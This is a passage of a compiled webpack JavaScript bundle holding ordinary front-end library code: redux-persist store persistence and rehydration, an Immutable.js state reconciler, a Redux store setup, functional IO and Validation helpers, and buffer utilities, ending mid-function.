/* harmony default export */ __webpack_exports__["a"] = (createTransform);

/***/ }),
/* 1934 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = persistStore;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(262);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getStoredState__ = __webpack_require__(975);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__createPersistor__ = __webpack_require__(971);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_setImmediate__ = __webpack_require__(973);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };






function persistStore(store) {
  var config = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};
  var onComplete = arguments[2];

  // defaults
  // @TODO remove shouldRestore
  var shouldRestore = !config.skipRestore;
  if (false) console.warn('redux-persist: config.skipRestore has been deprecated. If you want to skip restoration use `createPersistor` instead');

  var purgeKeys = null;

  // create and pause persistor
  var persistor = Object(__WEBPACK_IMPORTED_MODULE_2__createPersistor__["a" /* default */])(store, config);
  persistor.pause();

  // restore
  if (shouldRestore) {
    Object(__WEBPACK_IMPORTED_MODULE_3__utils_setImmediate__["a" /* default */])(function () {
      Object(__WEBPACK_IMPORTED_MODULE_1__getStoredState__["a" /* default */])(config, function (err, restoredState) {
        if (err) {
          complete(err);
          return;
        }
        // do not persist state for purgeKeys
        if (purgeKeys) {
          if (purgeKeys === '*') restoredState = {};else purgeKeys.forEach(function (key) {
            return delete restoredState[key];
          });
        }
        try {
          store.dispatch(rehydrateAction(restoredState, err));
        } finally {
          complete(err, restoredState);
        }
      });
    });
  } else Object(__WEBPACK_IMPORTED_MODULE_3__utils_setImmediate__["a" /* default */])(complete);

  function complete(err, restoredState) {
    persistor.resume();
    onComplete && onComplete(err, restoredState);
  }

  return _extends({}, persistor, {
    purge: function purge(keys) {
      purgeKeys = keys || '*';
      return persistor.purge(keys);
    }
  });
}

function rehydrateAction(payload) {
  var error = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;

  return {
    type: __WEBPACK_IMPORTED_MODULE_0__constants__["REHYDRATE"],
    payload: payload,
    error: error
  };
}

/***/ }),
/* 1935 */
/***/ (function(module, exports, __webpack_require__) {

var transit = __webpack_require__(976)
var reduxPersist = __webpack_require__(967)

module.exports = function (config) {
  config = config || {}

  var transitInstance = transit
  if (config.records) {
    transitInstance = transit.withRecords(config.records)
  }

  return reduxPersist.createTransform(
    function(state){
      return transitInstance.toJSON(state)
    },
    function(raw){
      return transitInstance.fromJSON(raw)
    },
    config
  )
}


/***/ }),
/* 1936 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports._stateInit = undefined;
exports._stateIterator = _stateIterator;
exports._stateGetter = _stateGetter;
exports._stateSetter = _stateSetter;

var _immutable = __webpack_require__(1);

var _stateInit = exports._stateInit = new _immutable.Map();

function _stateIterator(state, callback) {
  return state.forEach(callback);
}

function _stateGetter(state, key) {
  return state.get(key);
}

function _stateSetter(state, key, value) {
  return state.set(key, value);
}

/***/ }),
/* 1937 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.stateReconciler = stateReconciler;

var _immutable = __webpack_require__(1);

function stateReconciler(state, inboundState, reducedState, logger) {
  var newState = reducedState ? reducedState : (0, _immutable.Map)();

  Object.keys(inboundState).forEach(function (key) {
    // if initialState does not have key, skip auto rehydration
    if (!state.has(key)) return;

    // if reducer modifies substate, skip auto rehydration
    if (state.get(key) !== reducedState.get(key)) {
      if (logger) console.log('redux-persist/autoRehydrate: sub state for key `%s` modified, skipping autoRehydrate.', key);
      newState = newState.set(key, reducedState.get(key));
      return;
    }

    // otherwise take the inboundState
    if (state.has(key)) {
      newState = newState.mergeIn([key], inboundState[key]); // shallow merge
    } else {
      newState = newState.set(key, inboundState[key]); // hard set
    }

    if (logger) console.log('redux-persist/autoRehydrate: key `%s`, rehydrated to ', key, newState.get(key));
  });

  return newState;
}

/***/ }),
/* 1938 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux__ = __webpack_require__(192);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_devtools_extension__ = __webpack_require__(1950);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_devtools_extension___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_redux_devtools_extension__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable__ = __webpack_require__(966);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_index_js__ = __webpack_require__(996);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils_redux_utils__ = __webpack_require__(568);









/**
 * NOTE: We turned off logging in autoRehydrate because it was noisy and not
 * causing any real problems. It will end up telling you that many actions are
 * being dispatched before rehydrate has a chance to fire, which is fine, but
 * the lib will complain.
 */
/* harmony default export */ __webpack_exports__["a"] = (function (browserHistory) {
  var ajax = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils_redux_utils__["a" /* createAjax */])();
  var localStorage = window.localStorage;

  var epicMiddleware = Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["createEpicMiddleware"])(__WEBPACK_IMPORTED_MODULE_5_modules_index_js__["a" /* rootEpic */], {
    dependencies: { ajax: ajax, localStorage: localStorage }
  });

  var middlewares = [epicMiddleware, Object(__WEBPACK_IMPORTED_MODULE_2_react_router_redux__["routerMiddleware"])(browserHistory)];

  /* Configure Redux Logger */
  if (false) {
    var _require = require('redux-logger'),
        createLogger = _require.createLogger;

    var logger = createLogger(LoggerConfig);
    middlewares.push(logger);
  }

  var store = Object(__WEBPACK_IMPORTED_MODULE_0_redux__["createStore"])(__WEBPACK_IMPORTED_MODULE_5_modules_index_js__["b" /* rootReducer */], Object(__WEBPACK_IMPORTED_MODULE_3_redux_devtools_extension__["composeWithDevTools"])(__WEBPACK_IMPORTED_MODULE_0_redux__["applyMiddleware"].apply(undefined, middlewares), Object(__WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable__["autoRehydrate"])({ log: false }) // See NOTE
  ));

  return store;
});

/***/ }),
/* 1939 */,
/* 1940 */,
/* 1941 */,
/* 1942 */,
/* 1943 */,
/* 1944 */,
/* 1945 */,
/* 1946 */,
/* 1947 */,
/* 1948 */,
/* 1949 */,
/* 1950 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var compose = __webpack_require__(192).compose;

exports.__esModule = true;
exports.composeWithDevTools = (
  typeof window !== 'undefined' && window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__ ?
    window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__ :
    function() {
      if (arguments.length === 0) return undefined;
      if (typeof arguments[0] === 'object') return compose;
      return compose.apply(null, arguments);
    }
);

exports.devToolsEnhancer = (
  typeof window !== 'undefined' && window.__REDUX_DEVTOOLS_EXTENSION__ ?
    window.__REDUX_DEVTOOLS_EXTENSION__ :
    function() { return function(noop) { return noop; } }
);


/***/ }),
/* 1951 */,
/* 1952 */,
/* 1953 */,
/* 1954 */,
/* 1955 */,
/* 1956 */,
/* 1957 */,
/* 1958 */,
/* 1959 */,
/* 1960 */,
/* 1961 */,
/* 1962 */,
/* 1963 */,
/* 1964 */,
/* 1965 */,
/* 1966 */,
/* 1967 */,
/* 1968 */,
/* 1969 */,
/* 1970 */,
/* 1971 */,
/* 1972 */,
/* 1973 */,
/* 1974 */,
/* 1975 */,
/* 1976 */,
/* 1977 */,
/* 1978 */,
/* 1979 */,
/* 1980 */,
/* 1981 */,
/* 1982 */,
/* 1983 */,
/* 1984 */,
/* 1985 */,
/* 1986 */,
/* 1987 */,
/* 1988 */,
/* 1989 */,
/* 1990 */,
/* 1991 */,
/* 1992 */,
/* 1993 */,
/* 1994 */,
/* 1995 */,
/* 1996 */,
/* 1997 */,
/* 1998 */,
/* 1999 */,
/* 2000 */,
/* 2001 */,
/* 2002 */,
/* 2003 */,
/* 2004 */,
/* 2005 */,
/* 2006 */,
/* 2007 */,
/* 2008 */,
/* 2009 */,
/* 2010 */,
/* 2011 */,
/* 2012 */,
/* 2013 */,
/* 2014 */,
/* 2015 */,
/* 2016 */,
/* 2017 */,
/* 2018 */,
/* 2019 */,
/* 2020 */,
/* 2021 */,
/* 2022 */,
/* 2023 */,
/* 2024 */,
/* 2025 */,
/* 2026 */,
/* 2027 */,
/* 2028 */,
/* 2029 */,
/* 2030 */,
/* 2031 */,
/* 2032 */,
/* 2033 */,
/* 2034 */,
/* 2035 */,
/* 2036 */,
/* 2037 */,
/* 2038 */,
/* 2039 */,
/* 2040 */,
/* 2041 */,
/* 2042 */,
/* 2043 */,
/* 2044 */,
/* 2045 */,
/* 2046 */,
/* 2047 */,
/* 2048 */,
/* 2049 */,
/* 2050 */,
/* 2051 */,
/* 2052 */,
/* 2053 */,
/* 2054 */,
/* 2055 */,
/* 2056 */,
/* 2057 */,
/* 2058 */,
/* 2059 */,
/* 2060 */,
/* 2061 */,
/* 2062 */,
/* 2063 */,
/* 2064 */,
/* 2065 */,
/* 2066 */,
/* 2067 */,
/* 2068 */,
/* 2069 */,
/* 2070 */,
/* 2071 */,
/* 2072 */,
/* 2073 */,
/* 2074 */,
/* 2075 */,
/* 2076 */,
/* 2077 */,
/* 2078 */,
/* 2079 */,
/* 2080 */,
/* 2081 */,
/* 2082 */,
/* 2083 */,
/* 2084 */,
/* 2085 */,
/* 2086 */,
/* 2087 */,
/* 2088 */,
/* 2089 */,
/* 2090 */,
/* 2091 */,
/* 2092 */,
/* 2093 */,
/* 2094 */,
/* 2095 */,
/* 2096 */,
/* 2097 */,
/* 2098 */,
/* 2099 */,
/* 2100 */,
/* 2101 */,
/* 2102 */,
/* 2103 */,
/* 2104 */,
/* 2105 */,
/* 2106 */,
/* 2107 */,
/* 2108 */,
/* 2109 */,
/* 2110 */,
/* 2111 */,
/* 2112 */,
/* 2113 */,
/* 2114 */,
/* 2115 */,
/* 2116 */,
/* 2117 */,
/* 2118 */,
/* 2119 */,
/* 2120 */,
/* 2121 */,
/* 2122 */,
/* 2123 */,
/* 2124 */,
/* 2125 */,
/* 2126 */,
/* 2127 */,
/* 2128 */,
/* 2129 */,
/* 2130 */,
/* 2131 */,
/* 2132 */,
/* 2133 */,
/* 2134 */,
/* 2135 */,
/* 2136 */,
/* 2137 */,
/* 2138 */,
/* 2139 */,
/* 2140 */,
/* 2141 */,
/* 2142 */,
/* 2143 */,
/* 2144 */,
/* 2145 */,
/* 2146 */,
/* 2147 */,
/* 2148 */,
/* 2149 */,
/* 2150 */,
/* 2151 */,
/* 2152 */,
/* 2153 */,
/* 2154 */,
/* 2155 */,
/* 2156 */,
/* 2157 */,
/* 2158 */,
/* 2159 */,
/* 2160 */,
/* 2161 */,
/* 2162 */,
/* 2163 */,
/* 2164 */,
/* 2165 */,
/* 2166 */,
/* 2167 */,
/* 2168 */,
/* 2169 */,
/* 2170 */,
/* 2171 */,
/* 2172 */,
/* 2173 */,
/* 2174 */,
/* 2175 */,
/* 2176 */,
/* 2177 */,
/* 2178 */,
/* 2179 */,
/* 2180 */,
/* 2181 */,
/* 2182 */,
/* 2183 */,
/* 2184 */,
/* 2185 */,
/* 2186 */,
/* 2187 */,
/* 2188 */,
/* 2189 */,
/* 2190 */,
/* 2191 */,
/* 2192 */,
/* 2193 */,
/* 2194 */,
/* 2195 */,
/* 2196 */,
/* 2197 */,
/* 2198 */,
/* 2199 */,
/* 2200 */,
/* 2201 */,
/* 2202 */,
/* 2203 */,
/* 2204 */,
/* 2205 */,
/* 2206 */,
/* 2207 */,
/* 2208 */,
/* 2209 */,
/* 2210 */,
/* 2211 */,
/* 2212 */,
/* 2213 */,
/* 2214 */,
/* 2215 */,
/* 2216 */,
/* 2217 */,
/* 2218 */,
/* 2219 */,
/* 2220 */,
/* 2221 */,
/* 2222 */,
/* 2223 */,
/* 2224 */,
/* 2225 */,
/* 2226 */,
/* 2227 */,
/* 2228 */,
/* 2229 */,
/* 2230 */,
/* 2231 */,
/* 2232 */,
/* 2233 */,
/* 2234 */,
/* 2235 */,
/* 2236 */,
/* 2237 */,
/* 2238 */,
/* 2239 */,
/* 2240 */,
/* 2241 */,
/* 2242 */,
/* 2243 */,
/* 2244 */,
/* 2245 */,
/* 2246 */,
/* 2247 */,
/* 2248 */,
/* 2249 */,
/* 2250 */,
/* 2251 */,
/* 2252 */,
/* 2253 */,
/* 2254 */,
/* 2255 */,
/* 2256 */,
/* 2257 */,
/* 2258 */,
/* 2259 */,
/* 2260 */,
/* 2261 */,
/* 2262 */,
/* 2263 */,
/* 2264 */,
/* 2265 */,
/* 2266 */,
/* 2267 */,
/* 2268 */,
/* 2269 */,
/* 2270 */,
/* 2271 */,
/* 2272 */,
/* 2273 */,
/* 2274 */,
/* 2275 */,
/* 2276 */,
/* 2277 */,
/* 2278 */,
/* 2279 */,
/* 2280 */,
/* 2281 */,
/* 2282 */,
/* 2283 */,
/* 2284 */,
/* 2285 */,
/* 2286 */,
/* 2287 */,
/* 2288 */,
/* 2289 */,
/* 2290 */,
/* 2291 */,
/* 2292 */,
/* 2293 */,
/* 2294 */,
/* 2295 */,
/* 2296 */,
/* 2297 */,
/* 2298 */,
/* 2299 */,
/* 2300 */,
/* 2301 */,
/* 2302 */,
/* 2303 */,
/* 2304 */,
/* 2305 */,
/* 2306 */,
/* 2307 */,
/* 2308 */,
/* 2309 */,
/* 2310 */,
/* 2311 */,
/* 2312 */,
/* 2313 */,
/* 2314 */,
/* 2315 */,
/* 2316 */,
/* 2317 */,
/* 2318 */,
/* 2319 */,
/* 2320 */,
/* 2321 */,
/* 2322 */,
/* 2323 */,
/* 2324 */,
/* 2325 */,
/* 2326 */,
/* 2327 */,
/* 2328 */,
/* 2329 */,
/* 2330 */,
/* 2331 */,
/* 2332 */,
/* 2333 */,
/* 2334 */,
/* 2335 */,
/* 2336 */,
/* 2337 */,
/* 2338 */,
/* 2339 */,
/* 2340 */,
/* 2341 */,
/* 2342 */,
/* 2343 */,
/* 2344 */,
/* 2345 */,
/* 2346 */,
/* 2347 */,
/* 2348 */,
/* 2349 */,
/* 2350 */,
/* 2351 */,
/* 2352 */,
/* 2353 */,
/* 2354 */,
/* 2355 */,
/* 2356 */,
/* 2357 */,
/* 2358 */,
/* 2359 */,
/* 2360 */,
/* 2361 */,
/* 2362 */,
/* 2363 */,
/* 2364 */,
/* 2365 */,
/* 2366 */,
/* 2367 */,
/* 2368 */,
/* 2369 */,
/* 2370 */,
/* 2371 */,
/* 2372 */,
/* 2373 */,
/* 2374 */,
/* 2375 */,
/* 2376 */,
/* 2377 */,
/* 2378 */,
/* 2379 */,
/* 2380 */,
/* 2381 */,
/* 2382 */,
/* 2383 */,
/* 2384 */,
/* 2385 */,
/* 2386 */,
/* 2387 */,
/* 2388 */,
/* 2389 */,
/* 2390 */,
/* 2391 */,
/* 2392 */,
/* 2393 */,
/* 2394 */,
/* 2395 */,
/* 2396 */,
/* 2397 */,
/* 2398 */,
/* 2399 */,
/* 2400 */,
/* 2401 */,
/* 2402 */,
/* 2403 */,
/* 2404 */,
/* 2405 */,
/* 2406 */,
/* 2407 */,
/* 2408 */,
/* 2409 */,
/* 2410 */,
/* 2411 */,
/* 2412 */,
/* 2413 */,
/* 2414 */,
/* 2415 */,
/* 2416 */,
/* 2417 */,
/* 2418 */,
/* 2419 */,
/* 2420 */,
/* 2421 */,
/* 2422 */,
/* 2423 */,
/* 2424 */,
/* 2425 */,
/* 2426 */,
/* 2427 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return IO; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_compose__ = __webpack_require__(265);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_compose___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ramda_src_compose__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda_src_curry__ = __webpack_require__(197);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda_src_curry___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda_src_curry__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Either_js__ = __webpack_require__(299);





var identity = function identity(x) {
  return x;
};

/**
 * Wraps the execution of a function so that:
 *
 * - Execution is delayed until the calling code runs `either`
 * - Errors can be handled in a functional way with either
 * - We can easily build up a lazy computation based on the IO using map
 *
 * The last point is the biggest win of IO: It's lazy, meaning we can map away
 * all we want and it just builds up a computation. It will only be called at
 * the end when it is `fold`ed.
 *
 * NOTE: This is not strictly for IO, so IO may be a misnomer. It is really
 * useful for any code that has side effects or might throw an error. The latter
 * case is useful for building up a large lazy computation that could throw at
 * any number of points along the way. Since execution is delayed until fold is
 * called and it is tryCatch wrapped it doesn't matter where in the execution it
 * fails.
 */

var IO = function IO(f) {
  return {
    fn: f,
    map: function map(fs) {
      return IO(__WEBPACK_IMPORTED_MODULE_0_ramda_src_compose___default()(fs, f));
    },
    chain: function chain(g) {
      return IO(function () {
        var next = g(f()); // Must return IO
        return next.fn();
      });
    },

    fold: function fold(left, right) {
      return Object(__WEBPACK_IMPORTED_MODULE_2__Either_js__["tryCatch"])(f).fold(left, right);
    },

    // A shortcut for when we really just want to handle the left case and want to
    // use the identity function for the right case
    foldOr: function foldOr(left) {
      return Object(__WEBPACK_IMPORTED_MODULE_2__Either_js__["tryCatch"])(f).fold(left, identity);
    },

    either: Object(__WEBPACK_IMPORTED_MODULE_2__Either_js__["aliasMethod"])('fold')
  };
};

IO.of = function (x) {
  return IO(function () {
    return x;
  });
};

// A curried foldOr for use in fn pipelines
IO.foldOr = __WEBPACK_IMPORTED_MODULE_1_ramda_src_curry___default()(function (f, io) {
  return io.foldOr(f);
});

/***/ }),
/* 2428 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Success", function() { return Success; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Failure", function() { return Failure; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fromNullable", function() { return fromNullable; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "validate", function() { return validate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "combineValidations", function() { return combineValidations; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry__ = __webpack_require__(197);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ramda_src_curry__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda_src_curryN__ = __webpack_require__(84);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda_src_curryN___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda_src_curryN__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__Either_js__ = __webpack_require__(299);
/**
 * Adding full on flow typing wasn't working because it could not understand
 * chaining. It kept on saying for instance that ap(blah).ap(blah2) was not
 * valid because the result of ap was `prototype`. Maybe this si getting
 * interpreted as looking for `ap` on the Object.prototype, but that seems odd.
 * Hopefully next version of flow will make this simpler.
 *
 *  weak
 */



var T = function T() {
  return true;
};
var identity = function identity(x) {
  return x;
};



/* eslint-disable */


var Success = function Success(x) {
  return {
    value: x,
    isFailure: false,
    map: function map(f) {
      return Success(f(x));
    },
    fold: function fold(f) {
      var g = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : identity;
      return g(x);
    },
    ap: function ap(b) {
      return b.isFailure ? b : b.map(x);
    },
    toString: function toString() {
      return 'Success(' + x + ')';
    }
  };
};

Success.of = function (x) {
  return Success(x);
};

// For now Failure must take an array, because it needs to be concatable
var Failure = function Failure(x) {
  return {
    value: x,
    isFailure: true,
    map: function map(f) {
      return Failure(x);
    },
    fold: function fold(f) {
      var g = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : identity;
      return f(x);
    },
    ap: function ap(b) {
      return b.isFailure ? Failure(x.concat(b.value)) : Failure(x);
    }, // Hm...
    toString: function toString() {
      return 'Failure([' + x.join(', ') + '])';
    }
  };
};

Failure.of = function (x) {
  return Failure([x]);
};

var fromNullable = function fromNullable(x) {
  return Object(__WEBPACK_IMPORTED_MODULE_2__Either_js__["isNil"])(x) ? Failure(x) : Success(x);
};

/**
 * Given a predicate and a failure handler constructor a validation function
 * (any -> Success | Failure) that can be used with combineValidations.
 *
 * NOTE: I decided not to strictly require a funciton for the failure cause. Any
 * value can be provided, however, if the value is a function it will be called
 * with `x`. It could turn out that this is not a great idea or not worth it
 * simply to make the validation calls more concise, but for now the API is
 * defined that way.
 */
var validate = __WEBPACK_IMPORTED_MODULE_0_ramda_src_curry___default()(function (predicate, f, x) {
  var failure = typeof f === 'function' ? f(x) : f;
  return predicate(x) ? Success(x) : Failure.of(failure);
});

/**
 * An abstraction over constructing a curried applicative functor for use with
 * validations. Rationale: The fact that one has to curry a function by the
 * number of validtions present plus the fact that the return value of that
 * function doesn't really matter makes me see this as an implementation detail.
 * In a real app I just want to construct my validations using Success/Failure
 * and pass them to some function that will handle all the ap-ing and currying
 * for me.
 */
var combineValidations = function combineValidations() {
  for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
    args[_key] = arguments[_key];
  }

  return args.reduce(function (agg, validation) {
    return agg.ap(validation);
  }, Success(__WEBPACK_IMPORTED_MODULE_1_ramda_src_curryN___default()(args.length, T)));
};

/***/ }),
/* 2429 */,
/* 2430 */,
/* 2431 */,
/* 2432 */,
/* 2433 */,
/* 2434 */,
/* 2435 */,
/* 2436 */,
/* 2437 */,
/* 2438 */,
/* 2439 */,
/* 2440 */,
/* 2441 */,
/* 2442 */,
/* 2443 */,
/* 2444 */,
/* 2445 */,
/* 2446 */,
/* 2447 */,
/* 2448 */,
/* 2449 */,
/* 2450 */,
/* 2451 */,
/* 2452 */,
/* 2453 */,
/* 2454 */,
/* 2455 */,
/* 2456 */,
/* 2457 */,
/* 2458 */,
/* 2459 */,
/* 2460 */,
/* 2461 */,
/* 2462 */,
/* 2463 */,
/* 2464 */,
/* 2465 */,
/* 2466 */,
/* 2467 */,
/* 2468 */,
/* 2469 */,
/* 2470 */,
/* 2471 */,
/* 2472 */,
/* 2473 */,
/* 2474 */,
/* 2475 */,
/* 2476 */,
/* 2477 */,
/* 2478 */,
/* 2479 */,
/* 2480 */,
/* 2481 */,
/* 2482 */,
/* 2483 */,
/* 2484 */,
/* 2485 */,
/* 2486 */,
/* 2487 */,
/* 2488 */,
/* 2489 */,
/* 2490 */,
/* 2491 */,
/* 2492 */,
/* 2493 */,
/* 2494 */,
/* 2495 */,
/* 2496 */,
/* 2497 */,
/* 2498 */,
/* 2499 */,
/* 2500 */,
/* 2501 */,
/* 2502 */,
/* 2503 */,
/* 2504 */,
/* 2505 */,
/* 2506 */,
/* 2507 */,
/* 2508 */,
/* 2509 */,
/* 2510 */,
/* 2511 */,
/* 2512 */,
/* 2513 */,
/* 2514 */,
/* 2515 */,
/* 2516 */,
/* 2517 */,
/* 2518 */,
/* 2519 */,
/* 2520 */,
/* 2521 */,
/* 2522 */,
/* 2523 */,
/* 2524 */,
/* 2525 */,
/* 2526 */,
/* 2527 */,
/* 2528 */,
/* 2529 */,
/* 2530 */,
/* 2531 */,
/* 2532 */,
/* 2533 */,
/* 2534 */,
/* 2535 */,
/* 2536 */,
/* 2537 */,
/* 2538 */,
/* 2539 */,
/* 2540 */,
/* 2541 */,
/* 2542 */,
/* 2543 */,
/* 2544 */,
/* 2545 */,
/* 2546 */,
/* 2547 */,
/* 2548 */,
/* 2549 */,
/* 2550 */,
/* 2551 */,
/* 2552 */,
/* 2553 */,
/* 2554 */,
/* 2555 */,
/* 2556 */,
/* 2557 */,
/* 2558 */,
/* 2559 */,
/* 2560 */,
/* 2561 */,
/* 2562 */,
/* 2563 */,
/* 2564 */,
/* 2565 */,
/* 2566 */,
/* 2567 */,
/* 2568 */,
/* 2569 */,
/* 2570 */,
/* 2571 */,
/* 2572 */,
/* 2573 */,
/* 2574 */,
/* 2575 */,
/* 2576 */,
/* 2577 */,
/* 2578 */,
/* 2579 */,
/* 2580 */,
/* 2581 */,
/* 2582 */,
/* 2583 */,
/* 2584 */,
/* 2585 */,
/* 2586 */,
/* 2587 */,
/* 2588 */,
/* 2589 */,
/* 2590 */,
/* 2591 */,
/* 2592 */,
/* 2593 */,
/* 2594 */,
/* 2595 */,
/* 2596 */,
/* 2597 */,
/* 2598 */,
/* 2599 */,
/* 2600 */,
/* 2601 */,
/* 2602 */,
/* 2603 */,
/* 2604 */,
/* 2605 */,
/* 2606 */,
/* 2607 */,
/* 2608 */,
/* 2609 */,
/* 2610 */,
/* 2611 */,
/* 2612 */,
/* 2613 */,
/* 2614 */,
/* 2615 */,
/* 2616 */,
/* 2617 */,
/* 2618 */,
/* 2619 */,
/* 2620 */,
/* 2621 */,
/* 2622 */,
/* 2623 */,
/* 2624 */,
/* 2625 */,
/* 2626 */,
/* 2627 */,
/* 2628 */,
/* 2629 */,
/* 2630 */,
/* 2631 */,
/* 2632 */,
/* 2633 */,
/* 2634 */,
/* 2635 */,
/* 2636 */,
/* 2637 */,
/* 2638 */,
/* 2639 */,
/* 2640 */,
/* 2641 */,
/* 2642 */,
/* 2643 */,
/* 2644 */,
/* 2645 */,
/* 2646 */,
/* 2647 */,
/* 2648 */,
/* 2649 */,
/* 2650 */,
/* 2651 */,
/* 2652 */,
/* 2653 */,
/* 2654 */,
/* 2655 */,
/* 2656 */,
/* 2657 */,
/* 2658 */,
/* 2659 */,
/* 2660 */
/***/ (function(module, exports, __webpack_require__) {

/* eslint-disable node/no-deprecated-api */
var buffer = __webpack_require__(43)
var Buffer = buffer.Buffer

// alternative to using Object.keys for old browsers
function copyProps (src, dst) {
  for (var key in src) {
    dst[key] = src[key]
  }
}
if (Buffer.from && Buffer.alloc && Buffer.allocUnsafe && Buffer.allocUnsafeSlow) {
  module.exports = buffer
} else {
  // Copy properties from require('buffer')
  copyProps(buffer, exports)
  exports.Buffer = SafeBuffer
}

function SafeBuffer (arg, encodingOrOffset, length) {
  return Buffer(arg, encodingOrOffset, length)
}

// Copy static methods from Buffer
copyProps(Buffer, SafeBuffer)

SafeBuffer.from = function (arg, encodingOrOffset, length) {
  if (typeof arg === 'number') {
    throw new TypeError('Argument must not be a number')
  }
  return Buffer(arg, encodingOrOffset, length)
}

SafeBuffer.alloc = function (size, fill, encoding) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  var buf = Buffer(size)
  if (fill !== undefined) {
    if (typeof encoding === 'string') {
      buf.fill(fill, encoding)
    } else {
      buf.fill(fill)
    }
  } else {
    buf.fill(0)
  }
  return buf
}

SafeBuffer.allocUnsafe = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return Buffer(size)
}

SafeBuffer.allocUnsafeSlow = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return buffer.SlowBuffer(size)
}


/***/ }),
/* 2661 */,
/* 2662 */,
/* 2663 */
/***/ (function(module, exports) {

/* (ignored) */

/***/ }),
/* 2664 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

var Buffer = __webpack_require__(687).Buffer;
var util = __webpack_require__(2665);

function copyBuffer(src, target, offset) {
  src.copy(target, offset);
}

module.exports = function () {
  function BufferList() {
    _classCallCheck(this, BufferList);

    this.head = null;
    this.tail = null;
    this.length = 0;
  }

  BufferList.prototype.push = function push(v) {
    var entry = { data: v, next: null };
    if (this.length > 0) this.tail.next = entry;else this.head = entry;
    this.tail = entry;
    ++this.length;
  };

  BufferList.prototype.unshift = function unshift(v) {
    var entry = { data: v, next: this.head };
    if (this.length === 0) this.tail = entry;
    this.head = entry;
    ++this.length;
  };

  BufferList.prototype.shift = function shift() {
    if (this.length === 0) return;
    var ret = this.head.data;
    if (this.length === 1) this.head = this.tail = null;else this.head = this.head.next;
    --this.length;
    return ret;
  };

  BufferList.prototype.clear = function clear() {
    this.head = this.tail = null;
    this.length = 0;
  };

  BufferList.prototype.join = function join(s) {
    if (this.length === 0) return '';
    var p = this.head;
    var ret = '' + p.data;
    while (p = p.next) {
      ret += s + p.data;
    }return ret;
  };

  BufferList.prototype.concat = function concat(n) {
    if (this.length === 0) return Buffer.alloc(0);
    if (this.length === 1) return this.head.data;
    var ret = Buffer.allocUnsafe(n >>> 0);
    var p = this.head;
    var i = 0;
    while (p) {
